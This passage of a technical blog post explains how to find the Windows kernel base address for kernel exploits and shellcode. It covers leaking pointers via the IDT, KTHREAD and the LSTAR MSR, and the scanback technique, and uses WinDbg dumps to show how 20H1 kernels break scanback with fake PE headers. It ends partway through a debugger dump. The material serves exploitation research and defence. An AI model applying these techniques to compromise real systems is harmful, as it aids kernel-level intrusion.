❌

Reading view

There are new articles available, click to refresh the page.

Finding the Base of the Windows Kernel

Recently-ish (~2020), Microsoft changed the way the kernel image is mapped and also some implementation details of hal.dll. The kernel changes have caused existing methods of finding the base of the kernel via shellcode or a leak and arbitrary read to crash. This obviously isn't great, so I decided to figure out a way around the issue to support some code I've been writing in my free time (maybe more on that later).

Our discussion is going to start at Windows 10 1903 and then move up through Windows 10 21H2. These changes are also still present in Windows 11.

What's the point(er)?

Finding the base of the kernel is important for kernel exploits and kernel shellcode. If you can find the base of the kernel you can look up functions inside of it via the export table in its PE header. Various functions inside of the kernel allow you to allocate memory, start threads, and resolve other kernel module bases via the PsLoadedModuleList. Without being able to utilize kernel routines and symbols, you're pretty limited in what you can do if you're executing in kernel. Hopefully this clarifies why this post is even necessary.

[[more]]

Literature Review: Existing Methods

In order to understand where I am going with all of this, we first need to look at what techniques are already out there. This is split up into three parts: how to get to the base of the kernel, obtaining ("leaking") a kernel address to be used to find the base, and how to do version detection in kernel.

Getting to Kernel Base

Two of these methods rely on having some kind of memory leak of a kernel address, one does not. They really all have the same goal: to locate the base of the kernel.

All of these techniques apply to any PE file, not just the kernel.

NtQuerySystemInformation

The easiest and most version independent way to get the base of the kernel and all other kernel modules as via NtQuerySystemInformation using the SystemModuleInformation (0xB) member of the SYSTEM_INFORMATION_CLASS enumeration. When queried (with an appropriate buffer size), the function will return a filled out SYSTEM_MODULE_INFORMATION structure that contains a DWORD for the number of modules present and then an anysize array of SYSTEM_MODULE structures representing the modules. Here's some C code that uses it to query driver names and bases. You can actually get the base addresses and names of every kernel module via some documented APIs too: EnumDeviceDrivers and GetDeviceDriverBaseNameA from the PSAPI can be used together in order to accomplish that. On the backend they use NtQuerySystemInformation with the SystemModuleInformation class. FYI, psapi is just a small stub around the API set DLL api-ms-win-core-psapi-l1-1-0.dll, which ends up forwarding to kernelbase.dll in all versions.

kernelbase!EnumDeviceDrivers
A portion of kernelbase!EnumDeviceDrivers showing a call to NtQuerySystemInformation

GetDeviceDriverBaseNameA calls the unexported kernel32!FindDeviceDriver function, which again calls NtQuerySystemInformation with the SystemModuleInformation class.

Scan Backwards

In the event we cannot get any information from user-mode or we are in a low-integrity process, then the scanback technique can be used. Basically, we need a memory leak or reliable way of getting a kernel address to get in the "ballpark" of the kernel image. See the next section on "leaking" kernel addresses for more details on that. Once we have an address somewhere in the kernel, we can scan backwards one page (0x1000 bytes) at a time until we get to the PE header of the kernel image. This trick relies on two major assumptions:

  1. PE images are page aligned
  2. The memory space between the leaked address and the base of the kernel is contiguously mapped

We will see later that #2 isn't true on newer versions of Windows.

Every PE file starts with the bytes MZ (0x5a4d). To see if we have reached the beginning of the PE file, we can check to see if the page starts with MZ. If it does not, continue scanning back, if it does, then you have (probably) found the base of the image. I recommend doing a little bit more validation than that, such as seeing if the suspected base address + IMAGE_DOS_HEADER.e_lfanew contains the bytes PE (0x4550).

If you're interested in a code implementation of this technique, here's some code from zerosum0x0.

Relative Virtual Address (RVA)

The lamest of the kernel base finding methods is just to hard code the Relative Virtual Address (RVA) of the leaked symbol into your shellcode or exploit. This requires knowing the exact version(s) your code will be running on ahead of time and also requires version detection to support multiple versions of the kernel.

A slight variation on this method is to use an exported symbol from the leaked module to calculate its base. You can open the image file in user-mode and then look up the exported symbol to get its offset from the base address. This can be accomplished with LoadLibraryA and GetProcAddress. You can also do manual PE parsing. However, loading something like the kernel image into a user-mode process is pretty suspicious. You'll also need a way to pass the calculated RVA into your exploit or shellcode.

"Leaking" Kernel Addresses

To get a kernel address from an exploit you usually have to have a memory leak (information disclosure). When you're already executing via shellcode you have more options, but you still need to find a pointer into the kernel or another module to utilize the techniques above.

KPCR

Each logical processor on a Windows system has an associated structure called the Kernel Processor Control Region (KPCR). The KPCR is a massive structure, coming in at 0xC000 bytes as of the Windows 11 Beta. The first 0x180 bytes are almost entirely consistent across versions. At offset 0x180 lies the nested Kernel Processor Region Control Block (KPRCB) structure, which is very large and the reason that the KPCR is as large as it is. Members are added when major features (like KVAS) are added to the OS.

On 64-bit Windows, the GS segment register points to the KPCR for that processor. The swapgs instruction at kernel entry points (such as the system call handler, KiSystemCall64[Shadow], and Interrupt Service Routines (ISRs)) causes the processor to swap the contents of Model Specific Register (MSR) 0xC0000101 (GSBASE) with MSR 0xC0000102 (KERNEL_GSBASE). GSBASE is also the contents of the GS segment register. On 32-bit, 0x30 is explicitly loaded into FS at kernel entry points, and the GDT entry at offset 0x30 defines the base as the address of the KPCR for that processor.

nt!KiKernelSysretExit
swapgs at the 64-bit kernel entrypoint
nt!KiKernelSysretExit
Moving 0x30 into FS at the 32-bit kernel entrypoint

Both the upper members of the KPCR and the KPRCB have pointers into the kernel and other modules that might be of use to use while trying to calculate where exactly the kernel is located. The issue with the KPRCB is that fields change frequently, so the offset to a particular field of interest would be very version dependent.

Interrupt Descriptor Table

One classic and consistent place to find reliable pointers into the kernel in the KPCR is in the Interrupt Descriptor Table (IDT). The KPCR has a pointer to the IDT at offset 0x38, the IdtBase field. Dumping out quad words (with symbols) at that address gives some pointers into the kernel!

0: kd> dqs poi(@$pcr+38)+4
fffff802`35d8b004  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b00c  00102a40`00000000
fffff802`35d8b014  fffff802`39448e04 nt!KiDebugServiceTrap+0x44
fffff802`35d8b01c  00103040`00000000
fffff802`35d8b024  fffff802`39448e03 nt!KiDebugServiceTrap+0x43
fffff802`35d8b02c  001035c0`00000000
fffff802`35d8b034  fffff802`3944ee00 nt! ?? ::FNODOBFM::`string'+0x10
fffff802`35d8b03c  00103900`00000000
fffff802`35d8b044  fffff802`3944ee00 nt! ?? ::FNODOBFM::`string'+0x10
fffff802`35d8b04c  00103c40`00000000
fffff802`35d8b054  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b05c  00104180`00000000
fffff802`35d8b064  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b06c  00104680`00000000
fffff802`35d8b074  fffff802`39448e00 nt!KiDebugServiceTrap+0x40
fffff802`35d8b07c  00104a40`00000000

If you look a bit lower in the code from zerosum0x0 that I linked earlier you can see this is exactly the method being used to get a kernel address.

KTHREAD Pointers

One of the fields in the KPRCB that is consistent across versions of the kernel is the CurrentThread field at offset 8. This would be at the KPCR at offset 0x188 (x64). In fact, you'll see this offset repeatedly in the kernel, as this is what the kernel uses to get a pointer to the current thread running on the processor.

nt!KiKernelSysretExit
Here's an example from KiKernelSysretExit, which might look familiar from my KVAS post

If we dump pointers with symbols (dps) at the current thread over the size of KTHREAD, we can see many pointers into the kernel!

Pointers in KTHREAD (system thread)
0: kd> dps @$thread L@@C++(sizeof(nt!_KTHREAD)/8)
fffff802`39d4abc0  00000000`00200006
fffff802`39d4abc8  fffff802`39d4abc8 nt!KiInitialThread+0x8
fffff802`39d4abd0  fffff802`39d4abc8 nt!KiInitialThread+0x8
fffff802`39d4abd8  00000000`00000000
fffff802`39d4abe0  00000000`0791ddc0
fffff802`39d4abe8  fffff802`35d97c70
fffff802`39d4abf0  fffff802`35d92000
fffff802`39d4abf8  fffff802`35d98000
fffff802`39d4ac00  00000000`00000000
fffff802`39d4ac08  000000d2`4507715b
fffff802`39d4ac10  00000000`ffffffff
fffff802`39d4ac18  fffff802`35d97c00
fffff802`39d4ac20  fffff802`35d97cc0
fffff802`39d4ac28  00000000`00000000
fffff802`39d4ac30  00000409`00000100
fffff802`39d4ac38  00080000`00020044
fffff802`39d4ac40  00000000`00000000
fffff802`39d4ac48  00000000`00000000
fffff802`39d4ac50  00000000`00000000
fffff802`39d4ac58  fffff802`39d4ac58 nt!KiInitialThread+0x98
fffff802`39d4ac60  fffff802`39d4ac58 nt!KiInitialThread+0x98
fffff802`39d4ac68  fffff802`39d4ac68 nt!KiInitialThread+0xa8
fffff802`39d4ac70  fffff802`39d4ac68 nt!KiInitialThread+0xa8
fffff802`39d4ac78  ffffe70e`4e4a5040
fffff802`39d4ac80  00000000`00000000
fffff802`39d4ac88  00000000`00000000
fffff802`39d4ac90  00000000`00000000
fffff802`39d4ac98  00000000`00000000
fffff802`39d4aca0  00000000`00000000
fffff802`39d4aca8  00000000`00000000
fffff802`39d4acb0  00000000`00000000
fffff802`39d4acb8  00000000`00000000
fffff802`39d4acc0  00000000`00000008
fffff802`39d4acc8  fffff802`39d4ad90 nt!KiInitialThread+0x1d0
fffff802`39d4acd0  fffff802`39d4ad90 nt!KiInitialThread+0x1d0
fffff802`39d4acd8  00000000`00000000
fffff802`39d4ace0  00000000`00000000
fffff802`39d4ace8  00000000`00000000
fffff802`39d4acf0  6851f04c`965c27f1
fffff802`39d4acf8  00000000`00000000
fffff802`39d4ad00  00000000`00000000
fffff802`39d4ad08  00000000`00000000
fffff802`39d4ad10  00038a7a`00000401
fffff802`39d4ad18  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ad20  ffffe70e`506fcd88
fffff802`39d4ad28  00000000`00000000
fffff802`39d4ad30  00000000`00000000
fffff802`39d4ad38  00000000`00000000
fffff802`39d4ad40  00020002`00000000
fffff802`39d4ad48  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ad50  00000000`00000000
fffff802`39d4ad58  00000000`00000000
fffff802`39d4ad60  00000000`00000000
fffff802`39d4ad68  00000000`00000000
fffff802`39d4ad70  00014f81`00000000
fffff802`39d4ad78  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ad80  00000000`00000000
fffff802`39d4ad88  00000000`00000000
fffff802`39d4ad90  fffff802`39d4acc8 nt!KiInitialThread+0x108
fffff802`39d4ad98  fffff802`39d4acc8 nt!KiInitialThread+0x108
fffff802`39d4ada0  00000000`01020401
fffff802`39d4ada8  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4adb0  00000000`00000000
fffff802`39d4adb8  00000000`00000000
fffff802`39d4adc0  00000000`00000000
fffff802`39d4adc8  00000000`00000000
fffff802`39d4add0  00000000`00000000
fffff802`39d4add8  00000000`00000000
fffff802`39d4ade0  fffff802`39d47ac0 nt!KiInitialProcess
fffff802`39d4ade8  fffff802`39d1db90 nt!KiBootProcessorIdleThreadUserAffinity
fffff802`39d4adf0  00000000`00000000
fffff802`39d4adf8  00000000`00000014
fffff802`39d4ae00  fffff802`39d21cc0 nt!KiBootProcessorIdleThreadAffinity
fffff802`39d4ae08  00000000`00010000
fffff802`39d4ae10  00000000`00000004
fffff802`39d4ae18  fffff802`39d4ae18 nt!KiInitialThread+0x258
fffff802`39d4ae20  fffff802`39d4ae18 nt!KiInitialThread+0x258
fffff802`39d4ae28  fffff802`39d4ae28 nt!KiInitialThread+0x268
fffff802`39d4ae30  fffff802`39d4ae28 nt!KiInitialThread+0x268
fffff802`39d4ae38  fffff802`39d47ac0 nt!KiInitialProcess
fffff802`39d4ae40  00000000`19000000
fffff802`39d4ae48  00006804`7f580012
fffff802`39d4ae50  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ae58  00000000`00000000
fffff802`39d4ae60  00000000`00000000
fffff802`39d4ae68  fffff802`393b2170 nt!EmpCheckErrataList
fffff802`39d4ae70  fffff802`393b2170 nt!EmpCheckErrataList
fffff802`39d4ae78  fffff802`39337ac0 nt!KiSchedulerApc
fffff802`39d4ae80  fffff802`39d4abc0 nt!KiInitialThread
fffff802`39d4ae88  00000000`00000000
fffff802`39d4ae90  00000000`00000000
fffff802`39d4ae98  00000000`00000000
fffff802`39d4aea0  00000001`00060000
fffff802`39d4aea8  fffff802`39d4aea8 nt!KiInitialThread+0x2e8
fffff802`39d4aeb0  fffff802`39d4aea8 nt!KiInitialThread+0x2e8
fffff802`39d4aeb8  ffffe70e`4e535378
fffff802`39d4aec0  fffff802`39d47af0 nt!KiInitialProcess+0x30
fffff802`39d4aec8  fffff802`39d4aec8 nt!KiInitialThread+0x308
fffff802`39d4aed0  fffff802`39d4aec8 nt!KiInitialThread+0x308
fffff802`39d4aed8  00000000`0000003f
...

Now for consistency's sake, I'm going to explicitly dump out the same information from a user-mode thread, cmd.exe in this case.

Pointers in KTHREAD (user thread)
0:kd> dps ffffe70e57dee0c0 L@@C++(sizeof(nt!_KTHREAD)/8)
ffffe70e`57dee0c0  00000000`00a00006
ffffe70e`57dee0c8  ffffe70e`57dee0c8
ffffe70e`57dee0d0  ffffe70e`57dee0c8
...
ffffe70e`57dee350  ffffe70e`57dee0c0
ffffe70e`57dee358  ffffe70e`552eaf50
ffffe70e`57dee360  ffffe70e`57dee158
ffffe70e`57dee368  fffff802`393b2170 nt!EmpCheckErrataList
ffffe70e`57dee370  fffff802`393b2170 nt!EmpCheckErrataList
ffffe70e`57dee378  fffff802`39337ac0 nt!KiSchedulerApc
ffffe70e`57dee380  ffffe70e`57dee0c0
ffffe70e`57dee388  00000000`00000000
...

The output was shortened in places that did not have kernel pointers. Notice there are only three kernel pointers in this thread! The two different functions and their offsets into KTHREAD are consistent between the system thread and the user thread. If you check any thread, you will find that these pointers are present. What are these three fields? The offset into KTHREAD to the first nt!EmpCheckErrataList pointer is 0x2a8 (0xffffe70e57dee368-0xffffe70e57dee0c0). Dumping out KTHREAD gives the answer!

0: kd> dt -v -r1 _KTHREAD @$thread
nt!_KTHREAD
struct _KTHREAD, 225 elements, 0x480 bytes
   +0x000 Header           : struct _DISPATCHER_HEADER, 59 elements, 0x18 bytes
...
   +0x288 SchedulerApc     : struct _KAPC, 19 elements, 0x58 bytes
      +0x000 Type             : 0x12 ''
      +0x001 AllFlags         : 0 ''
      +0x001 CallbackDataContext : Bitfield 0y0
      +0x001 Unused           : Bitfield 0y0000000 (0)
      +0x002 Size             : 0x58 'X'
      +0x003 SpareByte1       : 0x7f ''
      +0x004 SpareLong0       : 0x6804
      +0x008 Thread           : 0xfffff802`39d4abc0 struct _KTHREAD, 225 elements, 0x480 bytes
      +0x010 ApcListEntry     : struct _LIST_ENTRY, 2 elements, 0x10 bytes
 [ 0x00000000`00000000 - 0x00000000`00000000 ]
      +0x020 KernelRoutine    : 0xfffff802`393b2170        void  nt!EmpCheckErrataList+0
      +0x028 RundownRoutine   : 0xfffff802`393b2170        void  nt!EmpCheckErrataList+0
      +0x030 NormalRoutine    : 0xfffff802`39337ac0        void  nt!KiSchedulerApc+0
      +0x020 Reserved         : [3] 0xfffff802`393b2170 Void
      +0x038 NormalContext    : 0xfffff802`39d4abc0 Void
      +0x040 SystemArgument1  : (null) 
      +0x048 SystemArgument2  : (null) 
      +0x050 ApcStateIndex    : 0 ''
      +0x051 ApcMode          : 0 ''
      +0x052 Inserted         : 0 ''
   +0x288 SchedulerApcFill1 : [3]  "???"
   +0x28b QuantumReset     : 0x7f ''
   +0x288 SchedulerApcFill2 : [4]  "???"
   +0x28c KernelTime       : 0x6804
   +0x288 SchedulerApcFill3 : [64]  "???"
   +0x2c8 WaitPrcb         : (null) 
   +0x288 SchedulerApcFill4 : [72]  "???"
...
The dt WinDbg command has a lot of useful options. -v and -r (used above) show sizes for fields and recurse through nested structures, respectively. Check out the docs for more options and info!

The fields are the KernelRoutine, RundownRoutine, and NormalRoutine function pointers in the SchedulerApc member of KTHREAD. These offsets have been consistent since Windows 8 RTM where the name of the field was changed from SuspendApc to SchedulerApc. Unfortunately, these function pointers seem to have been removed from Windows 21H1, probably to prevent this kind of disclosure. Of course you can just go back to the old versions to get the true use, since they are still present in newer Windows versions.

It's worth noting that I'm not the first one to discover this. Pages 20 and 21 of Morten Schenk's 2017 BlackHat briefing paper show that if you have a pointer to KTHREAD, then you can reliably get pointers into the kernel (hence why this is in the literature review section).

LSTAR MSR

When a syscall instruction is executed, the processor jumps to the address contained in the LSTAR Model Specific Register (MSR) (0xC0000082) after transitioning into kernel mode. This is not Windows specific behavior, as it is defined in the Intel Manual (Volume 2B, Chapter 4.3, SYSCALL). The system call handlers are unsurprisingly located in the kernel image, so if you can execute a rdmsr, you can get a pointer into the kernel. Of course this technique is only useful for shellcode or if you are somehow already executing in kernel.

With the introduction of KVAS, all of the kernel entry points were moved into a section in the kernel called KVASCODE. This section is present in both the user-mode and kernel-mode copies of the page tables. In kernels that have KVAS support up to Windows 10 19H2 the KVASCODE section directly borders the .text section, so if you are able to get an address of a kernel entry point (such as the one in the LSTAR MSR), then you can use it as a starting point for a scanback.

Passing in from Userland

Of course, one foolproof technique you can use to get the base of the kernel into your kernel mode payload is pass the address in from user-mode. This is assuming medium integrity execution in user-mode and will not help when you're dealing with a fully remote exploit.

Other Leaks

Talking about how more specific kernel memory leaks work is outside the scope of this post, but I will say that Microsoft very frequently patches kernel information disclosure bugs, so perhaps you can use my post about patch extraction and patch diffing to find and play with one :).

Version Detection in Kernel

Version detection can be accomplished by looking at the NtMajorVersion, NtMinorVersion, NtBuildNumber, and NtProductType fields of KUSER_SHARED_DATA, which is always located in the kernel at 0xFFDF0000 (32-bit) or 0xFFFFF78000000000 (64-bit). Microsoft recently randomized the writable version of this structure and a read-only mapping is located at the old static address. Information on that can be found on the MSRC blog and in this post by Connor McGarr.

Funny enough the NtMajorVersion is still 10 on Windows 11

What Has Changed?

Now that we are all up to speed on what techniques are already out there, we need to take a look at what Microsoft has changed in the most recent versions of Windows that get in the way of some of these techniques and then how to work around these changes to make sure exploitation and/or execution can keep working on 20H1 and higher.

Kernel Mapping and Fake Headers

In kernel versions prior to 20H1, the .text section of the kernel binary bordered the top of the image. This means that it also bordered the PE header for the image. This fact is why it is possible to use the scanback technique from a pointer into the .text section. In kernel versions 20H1 and up, the .text section no longer borders the PE header. In fact, no code sections at all border the PE header. The .rdata (read-only data), .pdata (exception data), and .idata (import data) sections now border the PE header. Between .idata and the next readable section, PROTDATA lies a few unmapped pages and then the text section at 0x200000 bytes offset from the base of the PE. Fortunately, .text and KVASCODE are contiguous with the sections in between them.

19H2 kernel memory segments
The image starts with .text and it borders the top of the image
20H2 kernel memory segments
The .text section and the base of the image are now non-contiguous

For the sake of validation, let's see if those pages are actually unmapped or if something is there. To do so, let's load up our trusty kernel debugger.

I'm just going to go back by a few thousand bytes fromt the kernel's text section into that gap and look over what is there, if anything.

0: kd> dc nt+200000-5000 L500
fffff806`6e3fb000  00000000 00000000 00002b00 72657355  .........+..User
fffff806`6e3fb010  68636143 746e4565 78457972 65726970  CacheEntryExpire
fffff806`6e3fb020  65754464 6f4c6f54 64656b63 73736553  dDueToLockedSess
fffff806`6e3fb030  006e6f69 00030b06 00000000 00000000  ion.............
fffff806`6e3fb040  55000032 43726573 65686361 72746e45  2..UserCacheEntr
fffff806`6e3fb050  70784579 64657269 54657544 536f4e6f  yExpiredDueToNoS
fffff806`6e3fb060  69737365 73416e6f 69636f73 6f697461  essionAssociatio
fffff806`6e3fb070  0b06006e 00000005 00000000 00720000  n.............r.
fffff806`6e3fb080  65735500 63614372 6e456568 53797274  .UserCacheEntryS
fffff806`6e3fb090  65746174 65706f00 69746172 6f436e6f  tate.operationCo
... boring, boring
fffff806`6e3fc000  00905a4d 00000003 00000004 0000ffff  MZ..............
fffff806`6e3fc010  000000b8 00000000 00000040 00000000  ........@.......
fffff806`6e3fc020  00000000 00000000 00000000 00000000  ................
fffff806`6e3fc030  00000000 00000000 00000000 000000e8  ................
fffff806`6e3fc040  0eba1f0e cd09b400 4c01b821 685421cd  ........!..L.!Th
fffff806`6e3fc050  70207369 72676f72 63206d61 6f6e6e61  is program canno
fffff806`6e3fc060  65622074 6e757220 206e6920 20534f44  t be run in DOS 
fffff806`6e3fc070  65646f6d 0a0d0d2e 00000024 00000000  mode....$.......

Well that looks interesting. It's a PE header... but to what?

0: kd> !dh fffff806`6e3fc000

File Type: DLL
FILE HEADER VALUES
     14C machine (i386)
       6 number of sections
2AB009D1 time date stamp Thu Sep 10 22:52:01 1992

       0 file pointer to symbol table
       0 number of symbols
      E0 size of optional header
    2102 characteristics
            Executable
            32 bit word machine
            DLL

OPTIONAL HEADER VALUES
     10B magic #
   14.20 linker version
   1A800 size of code
    4600 size of initialized data
       0 size of uninitialized data
    7370 address of entry point
    1000 base of code
         ----- new -----
0000000076570000 image base
    1000 section alignment
     200 file alignment
       3 subsystem (Windows CUI)
   10.00 operating system version
   10.00 image version
   10.00 subsystem version
   23000 size of image
     400 size of headers
   233EC checksum
0000000000040000 size of stack reserve
0000000000001000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
    4540  DLL characteristics
            Dynamic base
            NX compatible
            No structured exception handler
            Guard
   11D80 [    99D3] address [size] of Export Directory
   1D364 [     154] address [size] of Import Directory
   20000 [     3D8] address [size] of Resource Directory
       0 [       0] address [size] of Exception Directory
   1EE00 [    2690] address [size] of Security Directory
   21000 [    1304] address [size] of Base Relocation Directory
    28E0 [      54] address [size] of Debug Directory
       0 [       0] address [size] of Description Directory
       0 [       0] address [size] of Special Directory
       0 [       0] address [size] of Thread Storage Directory
    1000 [      AC] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
   1D000 [     360] address [size] of Import Address Table Directory
    E0AC [     320] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory


SECTION HEADER #1
   .text name
   1A753 virtual size
    1000 virtual address
   1A800 size of raw data
     400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read


Debug Directories(3)
    Type       Size     Address  Pointer
    (   96)   60f01       d640f    a340f
    (1342988301)    300b       c1d01    b741d
    (4028183069)c015e017       a2619  10f0114

SECTION HEADER #2
   .data name
     4F4 virtual size
   1C000 virtual address
     200 size of raw data
   1AC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #3
  .idata name
    1D9A virtual size
   1D000 virtual address
    1E00 size of raw data
   1AE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #4
  .didat name
     8C4 virtual size
   1F000 virtual address
     A00 size of raw data
   1CC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
C0000040 flags
         Initialized Data
         (no align specified)
         Read Write

SECTION HEADER #5
   .rsrc name
     3D8 virtual size
   20000 virtual address
     400 size of raw data
   1D600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #6
  .reloc name
    1304 virtual size
   21000 virtual address
    1400 size of raw data
   1DA00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

Everything seems to parse out OK, but there is some minor issues... For starters the machine type for this "DLL" is i386, which seems unlikely to be true since this is a 64-bit kernel. Another discrepancy is the debug directory, which seems to be completely bogus. It seems like there are a bunch of fake, mostly complete DOS/PE headers in that gap for some reason. The following command will find them all and dump their headers for closer inspection:

0: kd> .foreach (addr { s -[1]b nt L200000 4d 5a 90 00 03 }) { .echo ${addr}; dc ${addr} L20; !dh ${addr}; .echo }
NT header scan output
0xfffff806`6e200000
fffff806`6e200000  00905a4d 00000003 00000004 0000ffff  MZ..............
fffff806`6e200010  000000b8 00000000 00000040 00000000  ........@.......
fffff806`6e200020  00000000 00000000 00000000 00000000  ................
fffff806`6e200030  00000000 00000000 00000000 00000118  ................
fffff806`6e200040  0eba1f0e cd09b400 4c01b821 685421cd  ........!..L.!Th
fffff806`6e200050  70207369 72676f72 63206d61 6f6e6e61  is program canno
fffff806`6e200060  65622074 6e757220 206e6920 20534f44  t be run in DOS 
fffff806`6e200070  65646f6d 0a0d0d2e 00000024 00000000  mode....$.......

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
    8664 machine (X64)
      21 number of sections
73F1C0C4 time date stamp Fri Aug 22 23:49:24 2031

       0 file pointer to symbol table
       0 number of symbols
      F0 size of optional header
      22 characteristics
            Executable
            App can handle >2gb addresses

OPTIONAL HEADER VALUES
     20B magic #
   14.20 linker version
  8B5600 size of code
  1B7E00 size of initialized data
  495000 size of uninitialized data
  98D010 address of entry point
    1000 base of code
         ----- new -----
fffff8066e200000 image base
    1000 section alignment
     200 file alignment
       1 subsystem (Native)
   10.00 operating system version
   10.00 image version
   10.00 subsystem version
 1046000 size of image
     800 size of headers
  A65799 checksum
0000000000080000 size of stack reserve
0000000000002000 size of stack commit
0000000000100000 size of heap reserve
0000000000001000 size of heap commit
    4160  DLL characteristics
            High entropy VA supported
            Dynamic base
            NX compatible
            Guard
  134000 [   18C86] address [size] of Export Directory
  131630 [     168] address [size] of Import Directory
 1000000 [   3B23C] address [size] of Resource Directory
   C9000 [   67A7C] address [size] of Exception Directory
  A56600 [    2540] address [size] of Security Directory
 103C000 [    50B4] address [size] of Base Relocation Directory
   108E0 [      54] address [size] of Debug Directory
       0 [       0] address [size] of Description Directory
       0 [       0] address [size] of Special Directory
       0 [       0] address [size] of Thread Storage Directory
    5B30 [     118] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
  131000 [     620] address [size] of Import Address Table Directory
       0 [       0] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory


SECTION HEADER #1
  .rdata name
   C7940 virtual size
    1000 virtual address
   C7A00 size of raw data
     800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only


Debug Directories(3)
    Type       Size     Address  Pointer
    cv           25       406e0    3fee0    Format: RSDS, guid, 1, ntkrnlmp.pdb
    (   13)    1568       40708    3ff08
    (   16)      24       41cc4    414c4

SECTION HEADER #2
  .pdata name
   67A7C virtual size
   C9000 virtual address
   67C00 size of raw data
   C8200 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only

SECTION HEADER #3
  .idata name
    20C2 virtual size
  131000 virtual address
    2200 size of raw data
  12FE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only

SECTION HEADER #4
  .edata name
   18C86 virtual size
  134000 virtual address
   18E00 size of raw data
  132000 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
40000040 flags
         Initialized Data
         (no align specified)
         Read Only

SECTION HEADER #5
PROTDATA name
       1 virtual size
  14D000 virtual address
     200 size of raw data
  14AE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
48000040 flags
         Initialized Data
         Not Paged
         (no align specified)
         Read Only

SECTION HEADER #6
   GFIDS name
    8BFC virtual size
  14E000 virtual address
    8C00 size of raw data
  14B000 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000040 flags
         Initialized Data
         Discardable
         (no align specified)
         Read Only

SECTION HEADER #7
    Pad1 name
   A9000 virtual size
  157000 virtual address
       0 size of raw data
       0 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
42000080 flags
         Uninitialized Data
         Discardable
         (no align specified)
         Read Only

SECTION HEADER #8
   .text name
  3C6F59 virtual size
  200000 virtual address
  3C7000 size of raw data
  153C00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #9
    PAGE name
  3C5716 virtual size
  5C7000 virtual address
  3C5800 size of raw data
  51AC00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #A
  PAGELK name
   24E74 virtual size
  98D000 virtual address
   25000 size of raw data
  8E0400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #B
POOLCODE name
     48B virtual size
  9B2000 virtual address
     600 size of raw data
  905400 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
68000020 flags
         Code
         Not Paged
         (no align specified)
         Execute Read

SECTION HEADER #C
  PAGEKD name
    5B92 virtual size
  9B3000 virtual address
    5C00 size of raw data
  905A00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #D
PAGEVRFY name
   320EC virtual size
  9B9000 virtual address
   32200 size of raw data
  90B600 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #E
PAGEHDLS name
    25D6 virtual size
  9EC000 virtual address
    2600 size of raw data
  93D800 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
         Execute Read

SECTION HEADER #F
PAGEBGFX name
    69EA virtual size
  9EF000 virtual address
    6A00 size of raw data
  93FE00 file pointer to raw data
       0 file pointer to relocation table
       0 file pointer to line numbers
       0 number of relocations
       0 number of line numbers
60000020 flags
         Code
         (no align specified)
